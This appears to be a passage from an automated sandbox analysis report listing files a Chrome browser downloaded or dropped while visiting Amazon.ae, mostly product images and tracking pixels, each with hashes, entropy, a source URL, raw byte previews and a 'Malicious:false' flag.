                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......d......J......gAMA......a.....sRGB.........pHYs..........+......PLTE#/>B. 5I....~..Hm.~......?.c........Jm...V....]..j..w.......p..Oy.<T...........f...Ca.....x].iN......k.gL...vZ.sX..c..j...lQ.|a.{^...<V...p^..e.iW...kU....m.eH......h...~...nW.qU.Z<.`C.bH.dR....h.nS.hT.~b....kZ...gU....m\.kY.Cb.........^J.Y?..... ..h.y..mY.U9.Q}.aO.8...td.^B....qY........#..?1+'[[%...t[..o..]F:...q..YE.u..e.q....hU........,!..`..o.kOB0.x.dR..Q>5.|f...P5...bN.9Q3'".cTrVGjC0!9E..s....m....paH81.....!2D.[I%MW..#%&K1$...#CMZ:*..x..\QG.Q<4..U.."0@...?.....xc.x..n..i&.....v]OwK7H..jX......?\754...:...j\.Mu=).B..[YW"..v^T.......v...f.+Yn6..-,+.u....=..Gh2...)2.Z.....|......@AB.{.3..'07...)fc..y.......p,rj...h..IXa....._p.~.....LHF/o.m....Z....qrs...eca...3e~.}r.h.C..`~.l..Iz.L|....... .IDATx..[h.W...\l...Yl.......A.~(..Dkbh......N...d7&.`...um...~h.e.a.Ih.lJ..FIBC7.v...Q.l...}.s.".3.YJ......3c..wn...w>..A ...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2864
                                                                                                                                                                                                                                                                Entropy (8bit):7.825366417868477
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6kHx3N3TsHzdZfNe2lEDQ8nxGh4KWfX9NJDHFLlkBVNovu8bbbbbD:TMHTjsHvNeSqQ8nxFKWfFDdlkzN4Rbbf
                                                                                                                                                                                                                                                                MD5:3531AC69666646AC7B337B6E27651AC1
                                                                                                                                                                                                                                                                SHA1:6A889B3974DFFCA4A7BB10E7948CFD8932C8C664
                                                                                                                                                                                                                                                                SHA-256:B8CEB8727FDF03B6CB42F3FEC61C5BC819A89CF1C2797E79BC1344BDC241FF93
                                                                                                                                                                                                                                                                SHA-512:BDF212C15659B5C11FD4F36808C6F370B32839D611157CD1D46740F0CF6FEF62402ED9B61C89A5E16AC047D36595B795126213A65B9F18EDEA86586FF682D491
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621420_372x232_2X_en_AE._SY116_CB582980067_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!"1AQ.2aq...Rs.....Bbd.#35Sr..$%4ct.....................................................!1.2Bq."4A...Rr.............?..8..........................................TP.7.H.G@..T.'/q.*....|...I.r%.6o...#./q.1.M..z........W.2.DF..:O.o#..y.....j5...lY...rX........}_.....x.g.7......o#>./.O.h.....T9M.8C.`.b..m........-......P..x........$hp.*~.R.....S..v^..1{&.*..f..y..Q0.:....N.....h.=_""IX..................g.%....nO....s.Q.L..u.]..+.f!UUF..OP.:.=......@..0....vT~lv....|.......t#l\7.>5g...[.w....I.n.d.sy...G......&R.....g.....Y.;..e.8...}..o_..ru..........Qw......w:~..<.04.9u.T..o.......r.. ..V...^.......J..)=....23 ..$e."pA:..UK0..*...`.......'U.77...U......... .Z...t...%..;K.kYk..E..D~.........Y.,_z..|%...0.u...R...=z.G0....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):167
                                                                                                                                                                                                                                                                Entropy (8bit):5.111279005374292
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxocJ+qlkGOcFSKPCxvZ60WaNXbZ6+3vLKXAhvGXI9F4:haxB0qlkGOqRGMJaNX96IvLKXAhdI
                                                                                                                                                                                                                                                                MD5:C2076D9EB8087664920133620E56DA58
                                                                                                                                                                                                                                                                SHA1:946566C37B1C622F0C9D5B603A3C2DD6DA393ADA
                                                                                                                                                                                                                                                                SHA-256:075E99E9705C6718F9F73FD8214CB914207D723A8E4E5C763E11B72B9F820A8E
                                                                                                                                                                                                                                                                SHA-512:66DBF81CBBA177BFA500037BA7D39913EE4828C6E6534FBC55D64258CFC3FA2D3C2C832F71823541EA3F86D5DF1363B1C998F24E8F385C996AF262139B17A979
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.16755e0b.js" ></script></body></html>
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 251x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12744
                                                                                                                                                                                                                                                                Entropy (8bit):7.944287956667978
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:t5Z40KA68tpsRsxDcDS1d0wNN9hwKjSAfgJxX7tnZvZvGu3j2cffB:tX3V11cDS1eYSAs9tnZtGu2YfB
                                                                                                                                                                                                                                                                MD5:126677A1E30BB8C699ED38E2A31DD553
                                                                                                                                                                                                                                                                SHA1:AB7C9A93F1CB7A52AD4CF6BCEFDE1D3D4CCD7447
                                                                                                                                                                                                                                                                SHA-256:BA9A3C17D4A04894B425B272C0C222DD0572EB775E49CE0D389C9E4B3D6D757E
                                                                                                                                                                                                                                                                SHA-512:304550B341E76A81416E49BDBE009E76D74B8785A80A6DF98D21AB1C22B1F5A9CEF9976BF389B38DBE30ABD4FC6B2C2A27880BEBE41B6553CC1FA0737AE9E79E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/51H4u4crV3L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`..}!?I.a........./.|.y...>rt...lM..a.....7..7|..........T.b.&.........l(^...l... .1.*.YgT.)....Lc.D...].......r...Q....L.q.M9.D...S.~.9.....c.W..5.Nkm5O..[.....9....6.....Ep. FlH.......X.-a..C^..9+.m&..YE2.z.e-!.L....K.VvZ......B..>..YCf/....LqI.O8.........Lx...;.YU~-.+..6.c|..:Dc.i....n.,..!kY...L.2h.)f..F..F.+.?...r$r.....o[X..D..;..u.Iaz.....b..c.v.3...IoM`..+...}...e+.veZ.J....AhT1........A.....K&uG....%r@.eq.t.4m...i.D...9....5'_bK....,z.:...U..GP..C.....t_..."..."R(....N3..`j_.Ut.I:.f..+..C..X....=p.a..<....V\......I.(..6...].)......@..G;iS..L..U<...p.iR.w.....1H.l.=I..&Q.+8A,...\.....PS......\.XQk.}.....k.S..W1.E.,...LO..t.. ......+.....W2..o..2@....6._2.1..=....\...T...$ZL...:.7.wb.I2.^..j+w..6...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1912
                                                                                                                                                                                                                                                                Entropy (8bit):7.400541112445304
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6yoN+OpJvnnnHQbxYQ4trmZSaxv3mSxxgh13:TKogGJvnnw/EefvzxxgL
                                                                                                                                                                                                                                                                MD5:71F084F52C26055AB247D9991D6FB770
                                                                                                                                                                                                                                                                SHA1:0CD211136707F4BAA90758253D3DE91A83249A78
                                                                                                                                                                                                                                                                SHA-256:1761BA1BCD6D832F142709F2EF42D9C6D0CC7D451023ADF47AAB011B81692CFB
                                                                                                                                                                                                                                                                SHA-512:854969BF044A30C6553B0226C007579B0D0304BD91596391675FB1CEA032BCBAF72C5E4E4A0D33B9BAC16CD6F260112A7CC684E821456F0AA9A2F5491532F920
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745536_372x232_2X_en_AE._SY116_CB558011712_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1.."AQq.2aCbr..#34B....Rc...................................................!1A..Qa."2q................?..`...............................................................W].'m5.z..OrpU!..1...H......H.)''FY...F......?..".........L{E]........[..%.]P..%.~..6....n.km...jj.....Q!.?....4...6..u....O.M.... ./.P...c.:......U....c..H....*..c....|'.tc.+]-.:.O+..q...xt.'.....-..u?H.x......kU..?...._....Y.W...u..|I.(.b.-.Qo->r..x..E.O..*g..F.S..u...t.R.N2.ze<<<p...................^......W3T.Q...'.....K.o..K'.....b.{.i.....x.V..o...?..F...X..V....F..d[....Sm\.J.2.$..n2..R.f..`...o....-.....;P.F.^...PP.W.,%.E%.m<{..v......^....Fu..8..qNY.....V..ZP..-/.._..]..d..]...W....^..9.9...{c-.1...?.-c..CB..m.g..7.......x..5...R.K|g.Qo.5[.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12713
                                                                                                                                                                                                                                                                Entropy (8bit):7.9197486260353385
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:1HtuBh4o6vQ9DjIJ+AzEBXltwjhdHguiNI8oc++YZ/l3K21WQaQqZ8eZEjNJ7:1o2G/A2DgHgtNdox+YZM21FqpEjNF
                                                                                                                                                                                                                                                                MD5:24CEBF7991E389E13B60FDE7101C9F23
                                                                                                                                                                                                                                                                SHA1:B904A8687D7657360DDA742DAB87B4EEF95C5BEF
                                                                                                                                                                                                                                                                SHA-256:50219CF917848F2810CBD401A67C28C691A0C24F6ABA6BC518F2D76E9001F5A8
                                                                                                                                                                                                                                                                SHA-512:B10BF6562EE98EF0F6A448B7D34337EF82732E3271D41C17B80D6FEBD1866E499E2FFEB4752761795FBF0FCF03B4ED52AA411FEC3D0470AD65452338A311ED2F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."................................................ .................................................................[........-dR.........._.).{..S@as@....<?.C.s._...`~^.....m.@....Y..I..fw.4/..2..y.....n.....C.m.r...cK./...2..+G...........s...".%U.q.$..G..cR..G.YP...6...;....c.g.lh.<..q.'.....g._..j..v.8}_M.~......"..3$..!...#...|...%m..S. .=...[I.M...9...6`.<.....1.I8,....c.W=Y......l......c% ..<.v\...w..<V5..y.>..9.Q....*.....;"=.~5.2.P......q:.........,..g...k..... ......^..._..'..Y.~....fB.n..K4...b...)1..c...Q.v.]................#q.8,U.2T.QP2y?X=?....v_`.<..l.\f.{..t..e~Q.tjw..'.%*z....M.\.z.t.......B.7D.d....#...]#w..5.e2....O.........Nb....Q"...N?7.x..+....I..#l.C.s...F..c..g...>...../e.....Z......J.~H.......Mc.t...6G%....b.?...qg[........\..J.7c.X....l.^[#/.....[
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6754
                                                                                                                                                                                                                                                                Entropy (8bit):7.9353732773049845
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:NQq+Ca8fSYRNa7ghdzuu7fM5tI5H9eJ9sP86+6CLED:+q+R8n+mdfzM5toeJ0IcD
                                                                                                                                                                                                                                                                MD5:9B7B5796892D39255EDD560FA75B0DA8
                                                                                                                                                                                                                                                                SHA1:B1F3B79E3731092827C7427CF346AE5CDA5BAB4C
                                                                                                                                                                                                                                                                SHA-256:54868FDFE001509DCE35184E2968DB314595BDBCA80A0683BE644CAFC406041C
                                                                                                                                                                                                                                                                SHA-512:C05117A7B7F665AE2D7231AE7CD781684997B65FC61B89A28027C69B8D3DF508B87B317936FE6724A41DD8ECBC4B42CCFFAED8D90400E8B4D805B13CF421AE48
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!."1...ATV.....#2U.B.$3Q.SRv.................................................!1.a..."AQ..Rq..#$2b................?..ZR.....c.u.~..t,Z.8m......r.8.03...=..@J..Q.+`.I...H.:U..Z...{f.hc.h...~j..=.bJ.A.h.tmu..Z.-.2..T......#..-..x...k......{..'n...zn..q.]*..JR...(..W4..)Y..p.qf.g.,..5....A....1....A.t.X..6...~g..z..r.Vo....].K.........M.B..E..k.........q!.T.$g..u*...T%.....U.....,%.*I+l.2....*...zs?.e25.t8i...`.....h.[_.X...>...|.?..4.a.qE..:.7...z3.6+Z.{u.Zw.v.n....-;..o.W...j.OC<If./.....].y.F..;.owz.5g...O:..migs.P.6..P.1.|q..n...i...}.v.........xS..bo. .'.S.7.}..*....i...}.v.......D.D.O.......O....A.O....^..Wm....r....t...O.......O....A.O....^..Wm....r....t...O.......O....A.O....^..Wm....r....t...lf...e.k.=_...I
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 163x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4975
                                                                                                                                                                                                                                                                Entropy (8bit):7.903201180771204
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TD0+4+v1pw+AAz3K3HSf/+pArmJwsG4z1sbNzW2yI6nuqxA3:s+4+/we6X1imwsG4xazZq43
                                                                                                                                                                                                                                                                MD5:DEE3F164BB6C6FFF40C6F37ADE308D7A
                                                                                                                                                                                                                                                                SHA1:5608E77D18471883136CAA35F9B67F7D8A57EBDA
                                                                                                                                                                                                                                                                SHA-256:5F531831AC22C5F1BE6E7A2D1E25755D00E25BB0A18A07EAACC256BCA1B84ACE
                                                                                                                                                                                                                                                                SHA-512:5F6EBD18D747DCE18966ADB16C82EFACA552F0B694101D3126D57C83C9D7E95ED0DC97D4C1D2FF48A1C35CAF2139E4F423A1CB208BF8CF694BF05D5396A0F3F5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/51+h1QnUXbL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1.AQ.aq...."#23BRbr....$....Ss.4c......C....................................................?..R..R..R....0.xR.6M1.$..Ifh...<J.DnP....v.....D.E..<.=K".n?...k<-...x#...>1.h....6.~..CA6...8.t...S..]^K....-j...=....e...H.C.....kY4$.2..+i..F.&:...h..O`J...)@.)@.)@.)@.)@.)@.)@.)@.+..me..dBz.`.......]E,2......0...9.kH..D.+~V*k....)..I...).}..S_..P.~K.cU......w.%n.....SA..f..|"........h_.y.o.E....h..e$L[wq.8...k.E.z....B.....393..i^[>".....>..>...P)J4..%..h..o......5..635..q&q..(..A%...>....9....~...f.....n@..J.....E.........w.O.i....$s......;.G....{[%Y&P...X`......?tH...r.....6..J..<....#....d...:.go8..ix....G5..q.=o....@...8-..k....%>.z..>.V....._.'2.."..|.f..Fm...R=X...V..C.\H....j...%.......ZlV.)._../..ut..d.H.......W..n....D2Iu....l...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 244x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):19735
                                                                                                                                                                                                                                                                Entropy (8bit):7.972990422541549
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:/azpK1D2FW50jCnkxMNtSS/oi+nKMvbiRAur5hsTbj8whpmLJWNyY:/YweWOGnWMGS/mKWiRAurXkj8whpUJQ3
                                                                                                                                                                                                                                                                MD5:66D571D791CF14EC5F301165EFFE85B0
                                                                                                                                                                                                                                                                SHA1:E64E8D101543BB4D7109D49B5B1974298EBE8B12
                                                                                                                                                                                                                                                                SHA-256:71856C94C7A971BAC64BB24E54A3C685C812320248995E2A79772CD86300EE41
                                                                                                                                                                                                                                                                SHA-512:3CE3AFB0E983C3CD677AA193688618625A60B4822EAF85C22C9FE7C4D2AE0FD9F6CC5E1CA8EE6E104E1EB1A1384B2F5D46864198261361C8D7BA59F92F9BF476
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................rI$.I$.I.'...H`.oju.....!?d}D-`...{..Lp.SDrg..w@S...s....>y..prwhE.GD.>..<....2.+..V.D`.g..|.l......M..p*..}....G.?L.(..{7....X..c..N.Y.[......]?#c....o...j.......Gw.@n...g.xj|..[uF..M. ...'...Z...|..G~.....+Sv.t.w`p.I..R......vDt.A<.........N..%...5x..g. ...'.........o..;.zY/^m...k......}.k..i.kE....0..<.TeKa#.p.^.......1h........$0^[.2.)..W......gF.i..{..N.].t.^.cC..S.U.?L....(..(...s..z.9....`..M.h.J.M.3..].,.D<.W........I..".`.jVU.q.z.....U...o_.5.6.'..v,^..L...b...j.`.=.....U.8.EM..$.M...;....!..vpU5.....,....u......2r[...NP..%]..r.s....#-..L..)......<......._pI.....s..uNp.......e2.....!.WD6...0....e...&g.2...2.}.^)o.M5 .]V..s+...m...........D...;.+=.../...'..)."7~[.X...,3...}B..W..Z..|c......?.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?rid=P3EBDX30THKD0V702NQB&sid=262-5692979-3003613&rx=l60IynZ4ci9jRc/wD2xnwA
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26csmtags%3DendVL%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 289x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13460
                                                                                                                                                                                                                                                                Entropy (8bit):7.945148711424554
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:nN/YCtBBIoU1dw1K7fveh4q8QPgUstBq8Xpwa/Cm4gdWyQkR5qyHSOKSGGyed:N/LBBU1G1QOlYnPdpwa/hXd4m5KS3yQ
                                                                                                                                                                                                                                                                MD5:248D96BD664D2643757FE39028D62036
                                                                                                                                                                                                                                                                SHA1:250A921E8AE5A530CD581731DD06AC8A8C3A98B7
                                                                                                                                                                                                                                                                SHA-256:6B0704457211582CF03AB248E6E918ADAB5ABC12E1B6A33E29CCC25CA2C118B6
                                                                                                                                                                                                                                                                SHA-512:39752D4CE3855989095A014908CD8F934B6C035DE7624935EB1FFD3B0E33DD4E4D2CEE58B9F0F553BABA9A91EFDBDCB1B3648F68BB0F7C1E17149E286286126D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........!.."..........4.................................................................;..&..?...........e...0.........s...U^.~.....v...^?.5>1..]W4l.M.rs.C.....Z7..V..J.t..........4....1..e:g.....f<;[...8]"...4.j......p..uU..{................Di.+.......K=/....#...l.X...w..a....l*..k.Z.m.:........y~..?.NZ"\....Lh....C.......!..GFs/Ls?\_.I..[|}d=..Jkk5u.mW...k...].~}...s.}.Z.[Y.5.2....~ye.<.4?.<..$_>.k>Y.Nc..~~..3..b...l......?..G...I(C'b...]...X....z....;4.....{|N...k.....U...)X......m?M!.t.n.....[.>h..0..`...L.,u].i.....V9l...VZ..t..._\GlKM..l...O......[...&.....l.LO."f.jPsvR-.~.2.......E............=.y......'.y#.)..w.-.y.....TZ.6..........Mc{i......3..8I.mj...kh.sS+....)1..Wm.....4.#u.&..U.V...G....u..P...~..u....":...l.E....../.....xz._..:.Y.p......:..+....5..e.sf..J....K\.....%v...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D1541%26pc%3D27642%26at%3D27642%26t%3D1723469122091%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:27642
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3164
                                                                                                                                                                                                                                                                Entropy (8bit):7.8375800285875465
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6LvIis2SNhTklrX+Lw0TyuhcI6lgpJhWztTJeYeZY0qcs+9aCW0z5LYxYw3O:T7dsPLyucI5LN2+XBVL3NIsf
                                                                                                                                                                                                                                                                MD5:B3982EA57BC1FB02731E1D23C3FBFBBB
                                                                                                                                                                                                                                                                SHA1:22E06B12C5EBE084BE1567E71AA9E03086881EC8
